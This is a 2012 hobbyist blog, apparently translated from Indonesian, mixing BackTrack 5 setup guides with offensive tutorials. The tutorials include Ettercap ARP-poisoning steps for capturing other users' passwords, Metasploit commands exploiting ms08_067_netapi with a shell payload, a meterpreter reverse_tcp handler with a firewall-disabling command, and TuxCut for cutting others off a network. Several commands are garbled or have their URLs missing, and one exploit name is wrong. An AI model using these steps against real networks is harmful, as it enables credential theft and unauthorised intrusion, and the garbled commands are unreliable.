Saturday, June 16, 2012

how to change graphical mode whitout "startx" in backtrack 5

hello friends to day i will try to post about how to change your graphical mode in your backtrack 5 whitout "startx" command. make a backtrack be more approaching dekstop mode  whit eliminate mode "startx" more feel good whit this graphical for backtrack lovers.

-first display the repo ubuntu 10.04
-Install aynaptic, sudo apt-get install synaptic

-Install package GDM..
if GDM was success instaled, we will find the new menu, "Login Screen" following the menu System –>> Administration

and then, add new default Backtrack user using root as user.
type adduser
or install gnome-system-tools
run user-admin through menu System –> Administration –> Users and Groups to make new user. On the window “Users Settings” press the button  “Add“. on the window “Create New User“, please enter user full name that will on the coloms “Name” and enter username that will use for login on the columbs “Short Name:“…
on the window   “Change User Password” choose first options “Set password by hand” and then enter the password that you want on the clumbs “New password:” and type repeat that password on the columbs “Confirmation:“…
oke, now we was have new user, setting the user in order to have the right accesadministrative whit enter in to group “sudo“. choose user that you want and then press the button “Manage Groups“.
On the window “Groups settings” find the group whit name  “sudo” and then press button “Properties“. on the window “Group ‘sudo’ Properties” squire user name for enter the user that you want in to “Group Members” sudo, type “OK” and then close all window setting user and group..
 do the manual configuration in order to GDM service running whit otomathical moment starup.
run the terminal and then type following comand:
gedit /etc/rc.local
attach command line “service gdm start” just above “exit 0″ (look following pictures)…
saved the changed rc.local and then close gedit window.
please restart computer, so now Bactrack 5 whit automatic come to graphical mode whit use GDM as desktop manager 

choose user that was you made and then enter the password. press enter or click button “Log In
for come to desktop Gnome. how to ways to come the system using user root whit this GDM ?
that is easy please choose  “Other..” and then entered “root” on “Username:“, press enter and then enter the password root whit  “toor” and then press enter so you will entered to session GNOMe desktop as root.

congratulation to try.

Wednesday, May 30, 2012

how to install google chrome in linux/unix

before you read this posting i will give you know if this not my experience because i try to search this articles and i try to write whit other language. and pardon me if my language is bad. be cause i wanna be learn. 

at this time browser that on stretcher by google (google chrome or also chrominium) form browser that  
proper you try, possible if you using platform windows nothing a problem for installation. and also intense
many link downloads in the internet, now discuss only the process installation and too setting on the linux,
good for ubuntu linux, debian, linux mintand backtrack 5 too (backtrack 5 need a add setting).
if you install on ubuntu linux, debian, mint or other debian generation that the user not as root. so you enough run first ways only, so process installation finished. and actually it is also applies for all other distro linux
if you only install ordinary google chrome only, whit choice package format that appropriate whit your distro
on first ways (example deb. or rmp). 

  singgle step
on this step we will try install google chrome / chrominium on the linux whit two ways, and you can choice
one of.first step whit downloads it used to be software google-chrome or direct install through the terminal
ok direct only to first step.

first step:
if you not have internet connection, and only can to downloads on the warnet so this step that can you use
, please downloads it used to be software in this link disini . and then downloads the format package that
.deb. and if you use the 32 bit backtrack so downloads only 32 bit only.
 after that put the file downloaded before in the desktop or anywhere that easy to installation. and then open terminal on Aplication -> accessoris -> terminal and then type command following:
# cd Desktop //this if file installation on desktop
# sudo dpkg -i --force-depends *.deb //for install all file whit extension .deb
Note, to # do not type on the terminal and also in side right token //also not need to type, that only the comment. withing a moment and finished, akses google chrome on Aplication -> internet -> google chrome. enough to first step.
second step :
if your laptop or computer can to connect whit internet more prevalent using this second ways, namely
through linux terminal, and some command so will direct to download and install, the way first-first open first your terminal on Aplication -> accessoris -> terminal and then type the following command line:
# sudo add-apt-repository ppa:chromium-daily/stable // to add the repository
# sudo apt-get update
# sudo apt-get install chromium-browser
this token # do not type, so the installation processing anything finished if nothing interference whit your internet connection, and code above form command that use for installation on debian distro linux generation  (ubuntu,mint,backtrack etc).

Second step
if you using linux distro that the user root, then this step not need you follow, however this apply if your distro using root, example suppose that whit default from distro backtrack 5 that the user is root, or for you
that was often whit root, and you want to browsing on the user root and need this browser google chrome.
 for security reason so google chrome set in default for can't to running on the root mode, if you run so will
there will be a error message like following picture: Cara Install Chromium (Google Chrome) di Linux dan Jalankan Dalam Mode Root di Backtrack 5
the first way to be able to  run in state of the as root is whit change configuration on /usr/bin whit help editor from hexedit, this exactly the same if you want to install vlc in root mode, about the ways same too, 
second step :
#cd /usr/bin //comin to bin directory
#sudo gedit chromium-browser //browser that use chrome or this
#sudo gedit google-chrome //browser that used google chrome

on the gedit window looking for code this following :
and add this code --user-data-dir on the end of line about it, so will be :
exec $LIBDIR/$APPNAME $CHROMIUM_FLAGS "$@" --user-data-dir

like this following picture that whit red background print:
Cara Install Chromium (Google Chrome) di Linux dan Jalankan Dalam Mode Root di Backtrack 5
after you save and try run again the chrome or google-chrome, if not success notice again possible there that false ways, enough my post.

Saturday, May 26, 2012

how to sniffing whit ettercup

 ettercap is a sniffer program that good to sniffing activity, because it capture data on the local network. ettercap known capable capture all traffic of network and we can capture password enter the other user from we network. to analyze data that we captured. communication message like MSN or other instan client massaging, we can use whit man-in-the-Midler "MITM (Man The Midle)", etc.
first step and install sniffer (attecap).
and new version 0.7.3 and was provide to linux and windows OS.

Versi Windows
Versi Linux

 for distro debian basic / ubuntu enough to type:
# sudo apt-get install ettercap-gtk

to other distro, we have to download and compile the packet.

#. / Configure
# make
# make install

How to ?

first open Ettecap and run in root mode.

Sniffer > Unified Sniffing

choice the card network that want you to choice click "OK".

Hosts > Scan for Hosts

in the under screen side as "Host List is host that added" (they that listed in under is computer that onlie in the network).

Hosts > Host list

now will display IP from computer connect, must to remember that the router also come to appear.

choice your computer IP to attack and click "Add to Target 1", then route on "Add to Target 2".

before you doing sniffer, let us remember and use technique that called man-in-the-midler.

MITM > ARP Poisoning - now checking list on "Sniff remote connections" and click "OK"

Start > Start sniffing.

we was doing the sniffing.

View > Connections -  in this we can see all connect click double to can see data that at this bird, including
communicate user and password etc.

exploit windows server 2003 R2


Guide :
- use Nmap for known version of windows
- use Metasploit to do exploit
 What do i need ?

> Nmap -- on Backtrack 4 R2
> Metasploit -- on Backtrack 4 R2

Commands :

# msfconsole
# use exploit/windows/smb/ms08_067_netapi
# set payload windows/shell_bind_tcp
# set TARGET 8
# exploit

how to disabled firewall whit Metasploit

if you do exploit on the windows Operating system, and find it turn out firewall on the target of computer still in enable status, so we need do that different attack to disable Firewall for easily we activity.

use multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost IP_KITA
set lport 8080
netsh firewall set opmode disable

NOTE : this not my experience because i just write article that i find again to the other language.

to ward of tuxcut antinetcut and friends

1. Run the antinetcut application.
installing library phython 2.5 before or up of version and Libcap.
and then download application this link sini  to version 0.25 and this link sini.
and then ectract and come in whit root and then run through the terminal

#./ start
2. disable the icmp.
whit disable the icmp we can block packet poison.
sudo su
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
3. Protect Me on tuxcut
if you using linux, can install tuxcut so, because on the choice protect me, that protected from arp attack poisoning opponent.

how to remote backtrack using android

NOTE: this tutorial not my experience because i just find the article and try to write whit other language. 

if you usually can do remote Backtrack using Computer whit application Putty or type that same, now we will try do remote using application Android namely ConnectBot application that have small size because it's great benefits, ConnectBot usability is can do remote via ssh, telnet and local too, but the rest is if your screen SmartPhone too small may be you must be carefully moment type the command.

1. Install the application ConnectBot via market on your android.
2. run service ssh on Backtrack

root@:~# /etc/init.d/ssh start
 * Starting OpenBSD Secure Shell server sshd                             [ OK ] 

3. run ConnectBot on the android
4. enter the address whit root@BACKTRACK_IP_ADDRESS
note: - Ip Address Backtrack

5.wait until to connect and enter the password Backtrack.

6. good to use.
Image from : GK.NET

import equals Nmap into Metasploit

NOTE : this not my experience this tutorial just to remember me or to learning self i find the article in the my browser and i try to write in the other language. 

if we can often do scanning against one network, it is better if we save the result of the scanning for can to use to penetration activity on the next one, so we can continue to do penetration without dispose the time for doing the scanning process that over repeated and the scanning result can to import into Metasploit. to import the scanning result into we Metasploit  can to add the options -oX.

1. Do scanning against network and save to be scanresult.xml file.

root@gilakomputer:~# nmap -Pn -sS -A -oX hasilscan

2. Open the Metasploit and import the Nmap scanning using command db_import in order to saved
into database. for look are the data that we import success use the command host following

msf > db_import /root/hasilscan
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.4.3.1'
[*] Importing host
[*] Importing host
[*] Importing host
[*] Successfully imported /root/hasilscan

msf > hosts


address        mac                name  os_name             os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------             ---------  -----  -------  ----  --------    B0:48:7A:E7:49:2E        Wind River VxWorks                    device                           Linux               2.6.X             device  00:19:21:1D:E9:C5        Microsoft Windows   XP                device         

msf > hosts -c address


image from

Thursday, May 24, 2012

explain about armitage and how to use that

before you read this post i will give you know if this tutorial is not my experience i only searching with my webrowser and find this tutorial and i only write whit other language.

i will try to post about armitage and how to use the armitage. armitage actually is a visual tools and graphic for implementation metasploit in order easily to understand. if you little hard use or know about metasploit whit manually, in ordered armitage form tools that perfect for you, step by step.

make sure there is backtrack armitag in you.

zee-laptop@:~$ sudo apt-get update

zee-laptop@:~$ sudo apt-get install armitage

armitage connect whit metasploit using RPC daemon ( Remote Procedure Calls ) then lets us to connect.

zee-laptop@:~$ sudo  msfrpcd -f -U msf -P test -t Basic
[*] XMLRPC starting on (SSL):Basic…
armitage dengan metasploit

and next step we must active mysql server

zee-laptop@:~$ sudo /etc/init.d/mysql start

3. we run the armitage.

zee-laptop@:~$ cd /pentest/exploits/armitage
zee-laptop@:/pentest/exploits/armitage$ sudo ./
armitage dengan metasploit

make sure the display the kde window. put the check mark on the use sll
and then click button connect. . .for starting armitage
if was success thing about armitage will display like the following.
armitage dengan metasploit
 and next step we will learn about ways to scan with armitage for example we use the smb_version
auxilary — scanner — smb — smb_version

double click menu and then enter the range ip address for example

next click launch....notice the value  will seem there's 3 computer that online or up on the windows armitage right side we can look the graphic visualization of computer and the information IP. in the under side will look manually metasploit we can learn ways to use manually whit this tools.
click right on the icons for add icon os and see open port that service by the computer. and also can choice the computer remove facility that not to want.

following example for scanner TCP back to other menu scanner same like above , only to double click
auxilary — scanner — portscan — tcp

you can to enter manual the port for example : 80,25,43,45

the value we can to know about information about open port TCP on target computers.

you can too choice other exploit menu
after we have been able to turn on armitage whit good, to doing scanning. time we to try doing exploit msf whit armitage here we go.
in this example to exploit, we will to try exploit ms08_076_netapi
on the tree menu
exploit — windows — smb — ms08_076_netapi
run and look the value . and try the other metasploit.

(Digital Forensic) with tools Photorec

before you read my post i will give you know if this post not my experience i only read other site and i try to post with other language, because i now new learn seem with you. and this post will be my remember if i lost where i find this tutorial.

i will post about digital forensic that i find in a site moment i browsing, i'm sorry before if my english language is bad because i new learn to speak english i wish you can understand with my word in this post.

ok digital forensic is a series methodology  that basic from technique and procedure for collecting evidence of proof basic from entities or digital tools or device to allow can to use with legal as digital evidence.    

essentially in the digital forensic has 3 main step : namely to find and collect the data , authentication, and analysis. in this i will share about use the software that enter into one of three step it namely to find and collecting a data. 

more in the digital crime cases. for lost the trace.   digital criminal delete all data that can to turn the evidence.
how we find the data that we was deleted it.
whit this little software help "photorec" we can to recovery the data was deleted it.

"remember data that real we deleted in the fact never sure deleted"

if you install photerec not yet. you can download this link disini. in the fact this tools have been are in the backtrack . this tools is younger brother of testdisk. so if not false. if was installed testdisk means you was install the photorec.

what is the photorec.

you can read the source:

PhotoRec  is  file  data  recovery software designed to recover lost files including video, documents and archives from Hard Disks and CDRom and lost pictures (Photo Recovery) from digital camera memory. PhotoRec ignores the filesystem and goes after the  underlying  data,  so  it'll work  even if your media's filesystem is severely damaged or formatted. PhotoRec is safe to use, it will never attempt to write to the drive or memory support you are about to recover lost data from.

ok first we walk this application in the root whit type photorec.

and then will display the following image :

and then choice that will you recovery. in this for a experiment you can recovery your flash disk.
if you was choice  proceed.
and then will display the table partition. like this following.

choice appropriate your type partition from the your storage media. in this case the flash disk formatted FAT32. so in this case will choice Intel. if was press enter.

and then will display list from type the partition.
just choice the partition format that are. and then press enter search for starting to recovery.
there are also other options for modification the existing arrangement and file Opt to modification
file whatever that will to recovery after.

and then will display window type from file system. only choice other, because one more again we using Flash Disk.
and continue again. display again windows that give the choice to you and all you want to use any way to analysis data that will to recovery.

what is the free means in this here it just only will to recovery data was deleted only.or  all
Whole recovery data was deleted, crash or corruped data.
here will choice free, because only want to recovery data that was deleted. because if using choice Whole data that will to recovery will so many and will need the long time. 
 and then directories as to save data that was recovery.

selanjutnya pilih direktory sebagai penyimpanan data yang telah di recovery
and then recovery will running.
and finished you will see the data that lost or deleted.

Wednesday, May 23, 2012

running the ssh service in the backtrack

for user linux it maybe have been usual doing remote via ssh, but sometimes have a problem moment want to remote whit respect to backtrack.
maybe you have problem whit your rsa and key, and for improve follow the tutorial.
1. make sure openssh-server was installed
root@gilakomputer:~# apt-get install openssh-server
2. and type this command
root@gilakomputer:~# rm /etc/ssh/ssh_host_*
root@gilakomputer:~# ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key
root@gilakomputer:~# ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
root@gilakomputer:~# etc/init.d/ssh reload

netcut for linux (tuxcut)

Tuxcut, application for cut access internet on the network good hot spot or workgroup, whit utilize protocol ARP for sending ARP poisoning, take from official site.

Tucxcut made using PyQt programs language.

 excess Tuxcut from application one type like Netcut is completed fiture for protected self added mac scanning and mac changer. following is step installation Tuxcut on Ubuntu.
- Install arp-scan whit command

$ sudo apt-get install arp-scan
- install dsniff whit command
$ sudo apt-get install dsniff
- Install library
$ sudo apt-get install -f
- Install arptables, download version new arptables Install arptables, on the
$ wget
$ tar zxf arptables-v0.0.3-3.tar.gz
$ cd arptables-v0.0.3-3
$ sudo make && make install
- Install Tuxcut whit command
$ wget
$ sudo dpkg -i TuxCut-3.2_all.deb

UPDATE : Backtrack 5 R1
if you using bt 5 r1 moment running Tuxcut are that error whit message

 Connection Error","you are not connected to any network,TuxCut will Quit


arping: invalid option -- 'f'

ways to improve

root@bt:~# apt-get autoremove arping
root@bt:~# apt-get install iputils-arping
root@bt:~# apt-get install python-scapy

new service offensive-security to backtrack

image from officila site
Offensive-security as developer offensive distro
computer security more poppuler this time,
namely backtrack linux, just announce the new service that nature allows the company, organization and ordinary people can adapting they backtrack whit some choice adapting whit need or ordering, example we want distro backtrack that into only are packet for exploitation and wallpaper are logos company we have.

this new service can to access but whit pay some many (dependent on ISO value that in the produce) for dependent distribution packet, driver, to repair distribution we personal to new version backtrack public that we download from offensive site, follow is video from service about:   

for cost, service standart put a cost at above USD 13,000, and service premium whit cost above USD 25,000. so are friends want using this service,   

Untuk biaya, layanan Standart dikenakan biaya sekitar USD 13,000, dan layanan Premium dengan biaya sekitar USD 25,000. Jadi apakah sahabat ingin menggunakan layanan ini?

  service offensive site:

tutorial upgrade to backtrack 5 r2

this good news  come from backtrack official website that posting on the 24 feb 2012 old,

Backtrack 5 r2 believed will more stabill and complete from version backtrack before release.
excess that can feel on this backtrack 5 r2 is kernel that change to be 3.2.6, added again whit presence
added and updates on the applications in to, as well as repair the scurity. following tutorial from bt 5 r1 to bt5 r2. 

1. update and upgrade from bt 5 r1:

apt-get update
apt-get dist-upgrade

and then reboot for start kernel 3.2.6 from backtrack 5 r2 new. 2. upgrade splash screen if it is not still canges


3. check the new kernel

uname -a

look are kernel was changed to be 3.2.6
4. install new application that provide on backtrack 5 r2

apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero 
easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver
wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst 
watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog 
extundelete se-toolkit casefile sucrack dpscan dnschef

5. add the new repository in to backtrack

echo "deb revolution main microverse 
non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

if you was do upgrade on the new version revision, if display asks press "Enter" only and accept for "default"   

6.any service that installed will set for mode "start" moment do booting. for disabled type command following.

/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stop

update-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove

anonymous browsing on backtrack

do you ever realize that when it is browsing on the internet we computer address on the internet or Ip address saved and any time can known site have even human that has interest whit we address, the way more effective although are other way for site have to know we IP address whit using anonymous browsing
. this will using application that make for change we identity in the virtual world namely vidalia and add again Add-ons autoproxy for browser mozilla. following tutorial anonimous browsing in backtrack.     
Pernahkah sahabat menyadari bahwa ketika sedang berselancar diInternet Alamat komputer kita diInternet

1. open the terminal and install application vidalia, on package configuration check and then ok. 

root@bt:~# apt-get install vidalia

2. Install Ads-ons autoproxy.

Buka Tools > Add-ons > autoproxy

3. to active anonymous browsing click logo autoproxy inside right up on the browser.
3. Untuk mengaktifkan Anonymous Browsing klik logo autoproxy dibagian kanan atas Browser.

Change the message that display on time login in backtrack

maybe friends often see whit words yhat display moment success to log in and want in to GUI mode like this.

[*] Welcome to the BackTrack 5 Distribution, Codename \"Revolution\"

[*] Official BackTrack Home Page:

[*] Official BackTrack Training :

[*] To start a graphical interface, type "startx"
[*] The default root password is "toor"

to change the word above try type command following on the terminal:

root@bt:~# nano /etc/update-motd.d/10-help-text

now you can edit the word that will display on the moment log in.

Tuesday, May 22, 2012


Nmap, tool that being able to see the gap

Nmap, tool that being able to see the gap
sql injection is a commant sql to

learn about web hacking & known about bugs / vulnerability that are in web server

before i post this articles i very sory to you if my language english is bad  so my post not good do reade.
Ok to day i will share one of many application that can to we be learning media about web hacking & known about bugs / vulnerabillity that are in web server.
direct only i will  introduce to that not yet know..
DVWA is web application that was completed with bugs that can we learn, the goal is to known why the vulner can do.
inprehensive right..
some types of attack that was provide

sql injection
blind sql injection
and other vulner
what the avantages
whit this application we clearlly it is not necessary to crack & infiltrate into web application person have.
so that there is no reason again we unobstructed media to learn. we can also / give opportunity to choice
step difficulty that will we deal.
What is draowback...
this application last update by developer on 08-09-2010. with last version :v1.0.7.
this application less to know particularly in my countries. 

so no so popular whereas look the function that more good i think  this application is solution for we to want learning hacking world, particularly web hacking..
are two version that to rilis by developer
first version web server, can download this.
version live CD, can download this:
I apologies more good use that version server only , because more mild & more easy to configuration
that you need is mysql server. from developer self suggest use the XAMPP,
but upto you only want to using which type,

to day io will try to post about backtrack

sorry now  i don't know about backtrack i'm just want to learning about backtrack, so i will try to cast about
backtrack articles an i will to write again with other language.

ensuing a glance about backtrack liniux

Backtrack is one of distro linux born of slackware which  form merger from whax and auditor scurity collections.

Backtrack made by mati maharoni that form consultan scurrity from and agus N K. so form collaboration comunity. Backtrack self form merger from whax sform one of linux distro that used to scurity test that basic from whax self from knoppix. when Knoppix until verion 3.0 so namaed whit whax. whax can use to doing scurity test from  a variety of networking any where.

Max Moser form auditor scurrity collection that special whit self do scurrity penetration on linux.
composite from this auditor and whax self  produce 300 tool that used to testing networking scurrity. scurity
auditor scurrity can find on knoppix too.

fiture Backtrack
on between any tool that find on backtrack:

  • Metasploit integration
  • RFMON wireless drivers
  • Kismet
  • AutoScan-Network – AutoScan-Network is a network discovering and managing application
  • Nmap
  • Ettercap
  • Wireshark (formerly known as Ethereal)
  • Enumeration
  • Exploit Archives
  • Scanners
  • Password Attacks
  • Fuzzers
  • Spoofing
  • Sniffers
  • Tunneling
  • Wireless Tools
  • Bluetooth
  • Cisco Tools
  • Database Tools
  • Forensic Tools
  • BackTrack Services
  • Reversing
  • Misc
  • Aircrack-ng dan kawan kawan dll.

 But on the side tool backtrack networking to include mozilla, pidgin,k3b,xmms etc.

Backtrack rillis

-  26-5-2006 first time backtrack rilis form version non beta 1.0
- 13-10-2006 backtrack version 2 beta first time to public rillis
- 19-11-2006 backtrack version 2 beta second to public rilis 
- 06--3-2007 backtrack version 2 final rilis
- 17-12-2007 backtrack version 3 beta first rilis
- 19-03-2008 backtrack version 3 final rilis
- 11-01-2010 backtrack version 4 final rilis
- 10-05-2011 bactrack version 5 final rilis
inpressive right.

Backtrack 5 was rilised so we discus how to linux backtrack 5 installation only.

backtrack 5 based on Ubuntu Lucid (10,04LTS) that support 32 bit and 64 bit architectur. support KDE 4, Gnome and Fluxbox. White use kernel 2.6.38-rc5
Ok this step by step linux backtrack 5 installation.
1.Burn ISO Backtack 5 into DVD, restart the Computer and then booting

2. White until show image like follow and then choice "Backtrack Text- default boot text mode.

3.White until show like the following picture. And then type startx to comin the mode GUI (Desctop)
4. And then click icon install Backtrack on Desctop.

5. Choice language that you want.

6. Choice the location where you live, my suggestion indonesia and then click forward.
7. click forward only

8. If you want use all hardisk choice "erase and use entri hardisk".

but if you want make partition with manual way or to make a dual boot (Dual OS) choice "Spescify Partision manual (advance)" so will show page like following.

swap partision Swap can to make 2048 mb (recomended) or 1 giga can too.

9. white until process installation finished. so are command to restart(reboot).

Your Backtrack was installed so what else,, I have a tips was install backtrack doing.

1. Try install application WVDIAL / Gnome-app for internet connection using modem. the way.
2. Change the default password.
    for reset the default password please type passwd  on the terminal and then input the new password. 
3. active the visual effect please open setting>>system setting>>desktop effect>>all effect
    that is default that provide from tea backtrack self, minimallis compiz for KDE please experience your self
    and then other was provided also on KDE version to change icon, themes, windows border & other we not need (manually Downloads way) on the because was provided plugins that connect direct the site, only click get new themes only. and for gnome we need install compiz with manual ways.
apt-get install compiz compizconfig-setting-manager compiz-kde compiz-fusion-plugins-,main compiz-fusion-plugins-extra.  
4. install Synaptic (for easily search packets / application that we need)
apt-install synaptic
5. Active the Applet Sound (GNOME)
firs open preference>>startup aplications and then add
give the name upto you on the tab command input this comman
and then save.
6. fix-splass
to make display loading time booting mor beautifull. default is black-white.
while fix-plash